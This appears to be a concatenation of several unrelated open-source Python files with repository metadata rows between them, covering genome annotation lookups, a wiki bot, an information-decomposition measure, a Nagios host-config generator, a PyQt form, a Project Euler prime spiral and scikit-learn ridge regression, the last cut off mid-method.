for hit in annotations_in_region(var, "recomb", "bed"):
if hit.contig not in ['chrY']:
# recomb rate file is in bedgraph format.
# pysam will store the rate in the "name" field
count += 1
tot_rate += float(hit.name)
return float(tot_rate) / float(count) if count > 0 else None
def _get_first_vcf_hit(hit_iter):
if hit_iter is not None:
hits = list(hit_iter)
if len(hits) > 0:
return hits[0]
def _get_vcf_info_attrs(hit):
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=", 1)
info_map[key] = value
return info_map
def get_gms(var):
"""Return Genome Mappability Scores for multiple technologies.
"""
techs = ["illumina", "solid", "iontorrent"]
GmsTechs = collections.namedtuple("GmsTechs", techs)
hit = _get_first_vcf_hit(
annotations_in_region(var, "gms", "vcf", "grch37"))
attr_map = _get_vcf_info_attrs(hit) if hit is not None else {}
    return GmsTechs(*[attr_map.get("GMS_{0}".format(x), None) for x in techs])
def get_grc(var):
"""Return GRC patched genome regions.
"""
regions = set()
for hit in annotations_in_region(var, "grc", "bed", "grch37"):
regions.add(hit.name)
return ",".join(sorted(list(regions))) if len(regions) > 0 else None
def get_cse(var):
"""Return if a variant is in a CSE: Context-specific error region.
"""
for hit in annotations_in_region(var, "cse", "bed", "grch37"):
return True
return False
def get_encode_tfbs(var):
"""
Returns a comma-separated list of transcription factors that were
observed to bind DNA in this region. Each hit in the list is constructed
as TF_CELLCOUNT, where:
TF is the transcription factor name
CELLCOUNT is the number of cells tested that had nonzero signals
NOTE: the annotation file is in BED format, but pysam doesn't
tolerate BED files with more than 12 fields, so we just use the base
tuple parser and grab the name column (4th column)
"""
tfbs = []
for hit in annotations_in_region(var, "encode_tfbs", "tuple"):
tfbs.append(hit[3] + "_" + hit[4])
if len(tfbs) > 0:
return ','.join(tfbs)
else:
return None
def get_encode_dnase_clusters(var):
"""
If a variant overlaps a DnaseI cluster, return the number of cell types
that were found to have DnaseI HS at in the given interval, as well
as a comma-separated list of each cell type:
Example data:
chr1 20042385 20042535 4 50.330600 8988t;K562;Osteobl;hTH1
chr1 20043060 20043210 3 12.450500 Gm12891;T47d;hESCT0
chr1 20043725 20043875 2 5.948180 Fibrobl;Fibrop
chr1 20044125 20044275 3 6.437350 HESC;Ips;hTH1
"""
for hit in annotations_in_region(var, "encode_dnase1", "tuple"):
return ENCODEDnaseIClusters(hit[3], hit[5])
return ENCODEDnaseIClusters(None, None)
def get_encode_consensus_segs(var):
"""
Queries a meta-BEDGRAPH of consensus ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
CTCF: CTCF-enriched element
E: Predicted enhancer
PF: Predicted promoter flanking region
R: Predicted repressed or low-activity region
TSS: Predicted promoter region including TSS
T: Predicted transcribed region
WE: Predicted weak enhancer or open chromatin cis-regulatory element
"""
for hit in annotations_in_region(var, "encode_consensus_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_segway_segs(var):
"""
Queries a meta-BEDGRAPH of SegWay ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_segway_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_chromhmm_segs(var):
"""
    Queries a meta-BEDGRAPH of ChromHMM ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_chromhmm_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_resources( args ):
"""Retrieve list of annotation resources loaded into gemini.
"""
anno_files = get_anno_files( args )
return [(n, os.path.basename(anno_files[n])) for n in sorted(anno_files.keys())]
|
apache-2.0
| 5,353,853,671,318,104,000
| 37.726928
| 369
| 0.565338
| false
| 3.255713
| false
| false
| false
|
tarrow/librarybase-pwb
|
addpapers.py
|
1
|
1993
|
import queryCiteFile
import librarybase
import pywikibot
from epmclib.getPMCID import getPMCID
from epmclib.exceptions import IDNotResolvedException
import queue
import threading
import time
def rununthreaded():
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
for idx, citation in enumerate(citations[10513:]):
addpaper(idx, citation)
def runthreaded():
threads = []
for i in range(10):
        t = threading.Thread(target=worker)
t.start()
threads.append(t)
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
for citation in enumerate(citations[10513:]):
q.put(citation)
q.join()
for i in range(10):
q.put(None)
for t in threads:
t.join()
def worker():
    while True:
        item = q.get()
        if item is None:
            # None is the sentinel pushed by runthreaded() to stop this worker.
            q.task_done()
            break
        idx, citation = item
        addpaper(idx, citation)
        q.task_done()
def addpaper( idx, citation ):
start=time.time()
print(citation)
if citation is None:
return
print('trying to add {} number {}'.format(citation[5], idx))
site = pywikibot.Site("librarybase", "librarybase")
item = librarybase.JournalArticlePage(site)
pmcidobj = getPMCID(citation[5])
try:
pmcidobj.getBBasicMetadata()
except IDNotResolvedException:
print('Couldn\'t find in EPMC:' + citation[5])
return
metadata = pmcidobj.metadata
print("Got metadata in:" + str(time.time()-start))
if not item.articleAlreadyExists(metadata['pmcid']):
print('Item doesn\'t seem to exist. Setting metadata for: ' + metadata['pmcid'])
item.setMetaData(metadata)
print("set metadata in" + str(time.time()-start))
else:
print("{} already exists. Doing nothing".format(metadata['pmcid']))
q=queue.Queue()
rununthreaded()
|
mit
| 4,137,417,748,321,423,400
| 27.776119
| 92
| 0.60562
| false
| 3.746241
| false
| false
| false
|
Autoplectic/dit
|
dit/pid/iwedge.py
|
1
|
1110
|
"""
The I_wedge measure, as proposed by Griffith et al.
"""
from __future__ import division
from .pid import BasePID
from .. import Distribution
from ..algorithms import insert_meet
from ..multivariate import coinformation
class PID_GK(BasePID):
"""
The Griffith et al partial information decomposition.
This PID is known to produce negative partial information values.
"""
_name = "I_GK"
@staticmethod
def _measure(d, inputs, output):
"""
Compute I_wedge(inputs : output) = I(meet(inputs) : output)
Parameters
----------
d : Distribution
The distribution to compute i_wedge for.
inputs : iterable of iterables
The input variables.
output : iterable
The output variable.
Returns
-------
iwedge : float
The value of I_wedge.
"""
d = d.coalesce(inputs+(output,))
d = Distribution(d.outcomes, d.pmf, sample_space=d.outcomes)
d = insert_meet(d, -1, d.rvs[:-1])
return coinformation(d, [d.rvs[-2], d.rvs[-1]])
|
bsd-3-clause
| 7,420,420,584,193,200,000
| 24.227273
| 69
| 0.587387
| false
| 3.922261
| false
| false
| false
|
CanuxCheng/Nagios-Auto
|
nrobot/host/host.py
|
1
|
9599
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
######################################################################
# Copyright C 2015 Faurecia (China) Holding Co.,Ltd. #
# All rights reserved #
# Name: host.py
# Author: Canux canuxcheng@163.com #
# Version: V1.0 #
# Time: Thu 20 Aug 2015 02:27:23 AM EDT
######################################################################
# Description:
######################################################################
from base import NagiosAuto
import os
class Host(NagiosAuto):
"""This class have three options to create create host file in nagios.
You can specify the template you need.
If you create a lots of host file at one time, this is more effeciency.
"""
def __init__(self, *args, **kwargs):
"""Define some variables"""
super(Host, self).__init__(*args, **kwargs)
self.g_dir = self.args.path + "/hosts/"
self.host_conf = self.conf + "/host/"
self.area_conf = self.conf + "/area/"
self.area_list = ["as", "us", "eu"]
if self.__class__.__name__ == "Host":
self.logger.debug("==== END DEBUG ====")
def define_options(self):
"""Define some options used for create host."""
super(Host, self).define_options()
self.parser.add_argument("-t", "--types",
action="append",
dest="types",
required=False,
help="The host types, eg: ['ad', 'mii', \
'ijcore', 'mii_win-primary', 'mii_win-bck']. \
Read template from types.cfg and \
read hostname and ip address from types.txt. \
Use types@mode for normal host. \
mode=0 use dns as address. \
mode=1 use ip as address.")
self.parser.add_argument("-v", "--vcenter",
dest="vcenter",
required=False,
help="Vcenter for mii and ijcore vmware.")
def get_area(self, hostname):
"""Get the area us/eu/as according to hostname."""
try:
locate = hostname[0:2].upper()
self.logger.debug("locate: {}".format(locate))
for area in self.area_list:
area_file = self.area_conf + area + ".txt"
self.logger.debug("area_file: {}".format(area_file))
f = open(area_file, "r")
lines = f.readlines()
for line in lines:
if locate in line:
self.logger.debug("area: {}".format(area))
return area
self.not_exist(locate)
except Exception as e:
self.error("get_area: %s" % e)
def get_vcenter(self, vcenter):
"""Get the vcenter for vmware."""
try:
vcenterfile = self.area_conf + "vmware.txt"
self.logger.debug("vcenterfile: {}".format(vcenterfile))
fr = open(vcenterfile, "r")
lines = fr.readlines()
for line in lines:
if vcenter in line:
vcenter = "".join(line.split())
self.logger.debug("vcenter: {}".format(vcenter))
return vcenter
self.not_exist("%s" % vcenter)
except Exception as e:
self.error("get_vcenter: %s" % e)
def get_mii_site(self, hostname):
"""Get the for _MII_SITEDATABASE in mii primary or backup server."""
try:
mii_site = hostname[2:5].upper()
self.logger.debug("mii_site: {}".format(mii_site))
return mii_site
except Exception as e:
self.error("get_mii_site: %s" % e)
def get_types(self, types):
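        """Return (types, mode) parsed from a -t argument.
        Known types (ad, mii, ijcore, mii_win-primary, mii_win-bck) have a fixed
        address mode; any other value must be given as "types@mode", where mode 0
        uses the dns name as the address and mode 1 uses the ip address.
        """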
try:
if types in ["ad", "mii_win-primary", "mii_win-bck"]:
types = types
mode = 1
elif types in ["mii", "ijcore"]:
types = types
mode = 0
else:
old_type = types
types = old_type.split("@")[0]
mode = old_type.split("@")[1]
if not mode:
self.error("Please specify address mode for normal host.")
self.logger.debug("types: {}".format(types))
self.logger.debug("mode: {}".format(mode))
return types, mode
except Exception as e:
self.error("get_types: %s" % e)
def write_one_host(self, hostfile, lines, vcenter,
area, mii_site, hostname, address):
"""Write to one host file."""
try:
fw = open(hostfile, "w")
for l in lines:
self.logger.debug("l: {}".format(l))
if "ohtpl_area_%s" in l:
fw.write(l % area)
elif "ohtpl_sys_vmware_%s_%s" in l:
l_vcenter = l.replace("ohtpl_sys_vmware_%s_%s",
str(vcenter))
fw.write(l_vcenter)
elif "host_name" in l:
fw.write(l % hostname)
elif "address" in l:
fw.write(l % address)
elif "_MII_SITEDATABASE" in l:
fw.write(l % mii_site)
elif "%s" not in l:
fw.write(l)
                # If '%s' is present but not handled above, we can not fill it in.
                else:
                    self.error("write_host: unknown argument %s inside.")
except Exception as e:
self.error("write_one_host: %s" % e)
def create_host(self):
"""Get types from -t and read hostname and address and write to the \
hosts in nagios."""
try:
vcenter = ""
area = ""
mii_site = ""
for loop in range(0, len(self.args.types)):
types = self.args.types[loop]
self.logger.debug("types: {}".format(types))
(types, mode) = self.get_types(types)
# Get the template file.
template = self.host_conf + types + ".cfg"
self.logger.debug("template: {}".format(template))
ftr = open(template, "r")
lines = ftr.readlines()
# Get the hostname and address file.
host = self.host_conf + types + ".txt"
self.logger.debug("host: {}".format(host))
des_host = self.host_conf + types + ".tmp"
self.logger.debug("des_host: {}".format(des_host))
self.delete_blank_line(host, des_host)
fhr = open(des_host, "r")
h_lines = fhr.readlines()
for line in h_lines:
hostname = line.split()[0].split(".")[0].strip().upper()
self.logger.debug("hostname: {}".format(hostname))
address = line.split()[int(mode)].strip().lower()
self.logger.debug("address: {}".format(address))
hostfile = self.g_dir + hostname + ".cfg"
self.logger.debug("hostfile: {}".format(hostfile))
if types in ["ad"]:
area = self.get_area(hostname)
elif types in ["mii_win-primary", "mii_win-bck"]:
area = self.get_area(hostname)
mii_site = self.get_mii_site(hostname)
elif types in ["mii", "ijcore"]:
if self.args.vcenter:
vcenter = self.get_vcenter(self.args.vcenter)
else:
self.error("Please use -v to specify vcenter.")
# Write to the host in nagios.
if os.path.isfile(hostfile):
self.already_exist("%s" % hostfile)
if self.args.force:
self.write_one_host(hostfile, lines, vcenter, area,
mii_site, hostname, address)
else:
self.write_one_host(hostfile, lines, vcenter, area,
mii_site, hostname, address)
except Exception as e:
self.error("create_host: %s" % e)
def delete_host(self):
files = self.host_conf + "host.txt"
self.logger.debug("files: {}".format(files))
des_files = self.host_conf + "host.tmp"
self.logger.debug("des_files: {}".format(des_files))
self.delete_blank_line(files, des_files)
self.fr = open(des_files, "r")
self.lines = self.fr.readlines()
for line in self.lines:
self.logger.debug("line: {}".format(line))
hostname = line.split()[0].split(".")[0].strip().upper()
hostfile = self.g_dir + hostname + ".cfg"
self.logger.debug("hostfile: {}".format(hostfile))
if not os.path.isfile(hostfile):
self.not_exist("%s" % hostfile)
else:
try:
os.remove(hostfile)
except Exception as e:
self.error("remove_host: %s" % e)
|
bsd-3-clause
| -2,004,714,789,927,656,400
| 42.238739
| 79
| 0.449213
| false
| 4.331679
| false
| false
| false
|
radomd92/botjagwar
|
api/decorator.py
|
1
|
3279
|
import datetime
import multiprocessing
import threading
import time
def critical_section(cs_lock: threading.Lock):
"""
Decorator which uses acquires the specified lock when entering in the decorated function
and releases it once out of the decorated function.
:param cs_lock:
:return:
"""
def _critical_section(f):
def _critical_section_wrapper(*args, **kwargs):
cs_lock.acquire()
ret = f(*args, **kwargs)
cs_lock.release()
return ret
return _critical_section_wrapper
return _critical_section
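# Illustrative usage sketch (not part of the original module); "shared_lock"
# and "update_counter" are hypothetical names:
#     shared_lock = threading.Lock()
#     @critical_section(shared_lock)
#     def update_counter(counter):
#         counter['value'] += 1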
class run_once(object):
"""
Decorator for run-once methods
"""
__slots__ = ("func", "result", "methods")
def __init__(self, func):
self.func = func
def __call__(self, *args, **kw):
try:
return self.result
except AttributeError:
self.result = self.func(*args, **kw)
return self.result
def __get__(self, instance, cls):
method = self.func.__get__(instance, cls)
try:
return self.methods[method]
except (AttributeError,KeyError):
decorated = run_once(method)
try:
self.methods[method] = decorated
except AttributeError:
self.methods = { method : decorated }
return decorated
def __eq__(self, other):
return isinstance(other, run_once) and other.func == self.func
def __hash__(self):
return hash(self.func)
def singleton(class_):
"""
Specify that a class is a singleton
:param class_:
:return:
"""
instances = {}
def getinstance(*args, **kwargs):
if class_ not in instances:
instances[class_] = class_(*args, **kwargs)
return instances[class_]
return getinstance
def threaded(f):
def wrap(*args, **kwargs):
t = threading.Thread(target=f, args=args, kwargs=kwargs)
t.daemon = False
t.start()
return wrap
def separate_process(f):
"""
    Function runs in a separate process
:param f:
:return:
"""
def wrap(*args, **kwargs):
t = multiprocessing.Process(target=f, args=args, kwargs=kwargs)
t.start()
return wrap
def time_this(identifier='function'):
def _time_this(f):
def wrapper(*args, **kwargs):
t0 = datetime.datetime.now()
ret = f(*args, **kwargs)
t1 = datetime.datetime.now()
dt = t1 - t0
d = dt.seconds * 1000 + dt.microseconds / 1000
print(("%s took %2.6f seconds to execute" % (identifier, d/1000.)))
return ret
return wrapper
return _time_this
def retry_on_fail(exceptions, retries=5, time_between_retries=1):
    def _retry_on_fail(f):
        def wrapper(*args, **kwargs):
            m_retries = 0
            while True:
                try:
                    return f(*args, **kwargs)
                except tuple(exceptions) as e:
                    m_retries += 1
                    if m_retries <= retries:
                        print('Error:', e, '%d' % m_retries)
                        time.sleep(time_between_retries)
                    else:
                        raise e
        return wrapper
    return _retry_on_fail
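# Minimal self-test sketch added for illustration; it is not part of the original
# module, the function names are arbitrary, and it only runs when this file is
# executed directly.
if __name__ == '__main__':
    @time_this('slow_add')
    def slow_add(a, b):
        time.sleep(0.01)
        return a + b
    attempts = {'count': 0}
    @retry_on_fail([ValueError], retries=3, time_between_retries=0)
    def flaky():
        # Fails on the first call, succeeds on the second.
        attempts['count'] += 1
        if attempts['count'] < 2:
            raise ValueError('first call always fails')
        return attempts['count']
    print(slow_add(1, 2))  # prints the timing line, then 3
    print(flaky())         # retries once, then prints 2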
|
mit
| -8,227,460,502,292,809,000
| 24.818898
| 92
| 0.548033
| false
| 4.193095
| false
| false
| false
|
LegoStormtroopr/canard
|
SQBLWidgets/sqblUI/logicNodeText.py
|
1
|
3374
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/logicNodeText.ui'
#
# Created: Sat Jul 25 12:16:46 2015
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(534, 454)
self.verticalLayout = QtGui.QVBoxLayout(Form)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label = QtGui.QLabel(Form)
self.label.setWordWrap(True)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.targetRespondent = QtGui.QLineEdit(Form)
self.targetRespondent.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.targetRespondent.setObjectName(_fromUtf8("targetRespondent"))
self.verticalLayout.addWidget(self.targetRespondent)
self.label_2 = QtGui.QLabel(Form)
self.label_2.setStyleSheet(_fromUtf8("margin-top:8px;"))
self.label_2.setWordWrap(True)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout.addWidget(self.label_2)
self.purpose = QtGui.QTextEdit(Form)
self.purpose.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.purpose.setAcceptRichText(False)
self.purpose.setObjectName(_fromUtf8("purpose"))
self.verticalLayout.addWidget(self.purpose)
self.label_5 = QtGui.QLabel(Form)
self.label_5.setStyleSheet(_fromUtf8("margin-top:8px;"))
self.label_5.setWordWrap(True)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.verticalLayout.addWidget(self.label_5)
self.instruction = QtGui.QTextEdit(Form)
self.instruction.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.instruction.setObjectName(_fromUtf8("instruction"))
self.verticalLayout.addWidget(self.instruction)
self.label_2.setBuddy(self.purpose)
self.label_5.setBuddy(self.instruction)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(QtGui.QApplication.translate("Form", "Form", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Target Respondent</span> - <span style=\" font-size:small;\">The people who this section is specifically trying to gather data from.</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Purpose</span> - <small>Why are the people above identified and separated, and why are they being asked these questions.</small></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.label_5.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Instruction</span> - <small>Extra text about this routing and sequencing that may be shown to a respondent depending on the final questionnaire.</small></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
|
gpl-3.0
| -7,360,708,022,024,144,000
| 54.311475
| 334
| 0.698281
| false
| 3.748889
| false
| false
| false
|
rodgzilla/project-euler
|
problem_058/problem.py
|
1
|
1801
|
def _try_composite(a, d, n, s):
if pow(a, d, n) == 1:
return False
for i in range(s):
if pow(a, 2**i * d, n) == n-1:
return False
return True # n is definitely composite
def is_prime(n, _precision_for_huge_n=16):
    if n in _known_primes:
        return True
    if n in (0, 1):
        return False
if any((n % p) == 0 for p in _known_primes):
return False
d, s = n - 1, 0
while not d % 2:
d, s = d >> 1, s + 1
# Returns exact according to http://primes.utm.edu/prove/prove2_3.html
if n < 1373653:
return not any(_try_composite(a, d, n, s) for a in (2, 3))
if n < 25326001:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))
if n < 118670087467:
if n == 3215031751:
return False
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))
if n < 2152302898747:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))
if n < 3474749660383:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))
if n < 341550071728321:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))
# otherwise
return not any(_try_composite(a, d, n, s)
for a in _known_primes[:_precision_for_huge_n])
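# The spiral layer with side length 2n+1 has four corners; the corner (2n+1)**2
# is a perfect square and can never be prime, so only the other three corners
# (computed below) need to be tested (Project Euler problem 58).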
def primes_on_border(n):
new_numbers = [(2 * n + 1) ** 2 - 2 * n,
(2 * n + 1) ** 2 - 4 * n,
(2 * n + 1) ** 2 - 6 * n]
return len([num for num in new_numbers if is_prime(num)])
_known_primes = [2, 3]
_known_primes += [x for x in range(5, 1000, 2) if is_prime(x)]
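# Grow the spiral one layer at a time, tracking the ratio of primes among all
# diagonal values, and stop once that ratio first drops below 10%; the answer
# is the side length of that layer.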
total = 1
primes = 0
ratio = 1
i = 1
while ratio > 0.1:
total += 4
primes += primes_on_border(i)
ratio = primes / total
i += 1
print(2 * (i - 1) + 1)
|
gpl-3.0
| -2,561,185,032,495,983,000
| 32.351852
| 84
| 0.514159
| false
| 2.712349
| false
| false
| false
|
cdegroc/scikit-learn
|
sklearn/linear_model/ridge.py
|
1
|
19134
|
"""
Ridge regression
"""
# Author: Mathieu Blondel <mathieu@mblondel.org>
# License: Simplified BSD
import numpy as np
from .base import LinearModel
from ..utils.extmath import safe_sparse_dot
from ..utils import safe_asarray
from ..preprocessing import LabelBinarizer
from ..grid_search import GridSearchCV
def _solve(A, b, solver, tol):
    # helper method for ridge_regression, A is symmetric positive definite
if solver == 'auto':
if hasattr(A, 'todense'):
solver = 'sparse_cg'
else:
solver = 'dense_cholesky'
if solver == 'sparse_cg':
if b.ndim < 2:
from scipy.sparse import linalg as sp_linalg
sol, error = sp_linalg.cg(A, b, tol=tol)
if error:
raise ValueError("Failed with error code %d" % error)
return sol
else:
# sparse_cg cannot handle a 2-d b.
sol = []
for j in range(b.shape[1]):
sol.append(_solve(A, b[:, j], solver="sparse_cg", tol=tol))
return np.array(sol).T
elif solver == 'dense_cholesky':
from scipy import linalg
if hasattr(A, 'todense'):
A = A.todense()
return linalg.solve(A, b, sym_pos=True, overwrite_a=True)
else:
raise NotImplementedError('Solver %s not implemented' % solver)
def ridge_regression(X, y, alpha, sample_weight=1.0, solver='auto', tol=1e-3):
"""Solve the ridge equation by the method of normal equations.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
solver : {'auto', 'dense_cholesky', 'sparse_cg'}, optional
        Solver to use in the computational routines. 'dense_cholesky'
        will use the standard scipy.linalg.solve function, 'sparse_cg'
        will use a conjugate gradient solver as found in
        scipy.sparse.linalg.cg, while 'auto' will choose the most
        appropriate depending on the matrix X.
tol: float
Precision of the solution.
Returns
-------
coef: array, shape = [n_features] or [n_responses, n_features]
Weight vector(s).
Notes
-----
This function won't compute the intercept.
"""
n_samples, n_features = X.shape
is_sparse = False
if hasattr(X, 'todense'): # lazy import of scipy.sparse
from scipy import sparse
is_sparse = sparse.issparse(X)
if is_sparse:
if n_features > n_samples or \
isinstance(sample_weight, np.ndarray) or \
sample_weight != 1.0:
I = sparse.lil_matrix((n_samples, n_samples))
I.setdiag(np.ones(n_samples) * alpha * sample_weight)
c = _solve(X * X.T + I, y, solver, tol)
coef = X.T * c
else:
I = sparse.lil_matrix((n_features, n_features))
I.setdiag(np.ones(n_features) * alpha)
coef = _solve(X.T * X + I, X.T * y, solver, tol)
else:
if n_features > n_samples or \
isinstance(sample_weight, np.ndarray) or \
sample_weight != 1.0:
# kernel ridge
# w = X.T * inv(X X^t + alpha*Id) y
A = np.dot(X, X.T)
A.flat[::n_samples + 1] += alpha * sample_weight
coef = np.dot(X.T, _solve(A, y, solver, tol))
else:
# ridge
# w = inv(X^t X + alpha*Id) * X.T y
A = np.dot(X.T, X)
A.flat[::n_features + 1] += alpha
coef = _solve(A, np.dot(X.T, y), solver, tol)
return coef.T
class Ridge(LinearModel):
"""Linear least squares with l2 regularization.
This model solves a regression model where the loss function is
the linear least squares function and regularization is given by
the l2-norm. Also known as Ridge Regression or Tikhonov regularization.
This estimator has built-in support for multi-variate regression
(i.e., when y is a 2d-array of shape [n_samples, n_responses]).
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
tol: float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_responses, n_features]
Weight vector(s).
See also
--------
RidgeClassifier, RidgeCV
Examples
--------
>>> from sklearn.linear_model import Ridge
>>> import numpy as np
>>> n_samples, n_features = 10, 5
>>> np.random.seed(0)
>>> y = np.random.randn(n_samples)
>>> X = np.random.randn(n_samples, n_features)
>>> clf = Ridge(alpha=1.0)
>>> clf.fit(X, y) # doctest: +NORMALIZE_WHITESPACE
Ridge(alpha=1.0, copy_X=True, fit_intercept=True, normalize=False,
tol=0.001)
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, tol=1e-3):
self.alpha = alpha
self.fit_intercept = fit_intercept
self.normalize = normalize
self.copy_X = copy_X
self.tol = tol
def fit(self, X, y, sample_weight=1.0, solver='auto'):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
solver : {'auto', 'dense_cholesky', 'sparse_cg'}
Solver to use in the computational
            routines. 'dense_cholesky' will use the standard
            scipy.linalg.solve function, 'sparse_cg' will use a
            conjugate gradient solver as found in
            scipy.sparse.linalg.cg, while 'auto' will choose the most
            appropriate depending on the matrix X.
Returns
-------
self : returns an instance of self.
"""
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
X, y, X_mean, y_mean, X_std = \
self._center_data(X, y, self.fit_intercept,
self.normalize, self.copy_X)
self.coef_ = ridge_regression(X, y, self.alpha, sample_weight,
solver, self.tol)
self._set_intercept(X_mean, y_mean, X_std)
return self
class RidgeClassifier(Ridge):
"""Classifier using Ridge regression.
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
tol: float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_classes, n_features]
Weight vector(s).
See also
--------
Ridge, RidgeClassifierCV
Notes
-----
For multi-class classification, n_class classifiers are trained in
a one-versus-all approach. Concretely, this is implemented by taking
advantage of the multi-variate response support in Ridge.
"""
def fit(self, X, y, solver='auto'):
"""Fit Ridge regression model.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples,n_features]
Training data
y : array-like, shape = [n_samples]
Target values
solver : {'auto', 'dense_cholesky', 'sparse_cg'}
Solver to use in the computational
            routines. 'dense_cholesky' will use the standard
            scipy.linalg.solve function, 'sparse_cg' will use a
            conjugate gradient solver as found in
            scipy.sparse.linalg.cg, while 'auto' will choose the most
            appropriate depending on the matrix X.
Returns
-------
self : returns an instance of self.
"""
self.label_binarizer = LabelBinarizer()
Y = self.label_binarizer.fit_transform(y)
Ridge.fit(self, X, Y, solver=solver)
return self
def decision_function(self, X):
return Ridge.decision_function(self, X)
def predict(self, X):
"""Predict target values according to the fitted model.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
y : array, shape = [n_samples]
"""
Y = self.decision_function(X)
return self.label_binarizer.inverse_transform(Y)
class _RidgeGCV(LinearModel):
"""Ridge regression with built-in Generalized Cross-Validation
It allows efficient Leave-One-Out cross-validation.
This class is not intended to be used directly. Use RidgeCV instead.
Notes
-----
We want to solve (K + alpha*Id)c = y,
where K = X X^T is the kernel matrix.
Let G = (K + alpha*Id)^-1.
Dual solution: c = Gy
Primal solution: w = X^T c
Compute eigendecomposition K = Q V Q^T.
Then G = Q (V + alpha*Id)^-1 Q^T,
where (V + alpha*Id) is diagonal.
It is thus inexpensive to inverse for many alphas.
Let loov be the vector of prediction values for each example
when the model was fitted with all examples but this example.
loov = (KGY - diag(KG)Y) / diag(I-KG)
Let looe be the vector of prediction errors for each example
when the model was fitted with all examples but this example.
looe = y - loov = c / diag(G)
**References**:
http://cbcl.mit.edu/projects/cbcl/publications/ps/MIT-CSAIL-TR-2007-025.pdf
http://www.mit.edu/~9.520/spring07/Classes/rlsslides.pdf
"""
def __init__(self, alphas=[0.1, 1.0, 10.0], fit_intercept=True,
normalize=False, score_func=None, loss_func=None, copy_X=True):
self.alphas = np.asarray(alphas)
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.copy_X = copy_X
def _pre_compute(self, X, y):
# even if X is very sparse, K is usually very dense
K = safe_sparse_dot(X, X.T, dense_output=True)
from scipy import linalg
v, Q = linalg.eigh(K)
return K, v, Q
def _errors(self, v, Q, y, alpha):
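        # Leave-one-out errors via the identity from the class notes
        # (looe = y - loov = c / diag(G)), returned here as squared errors.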
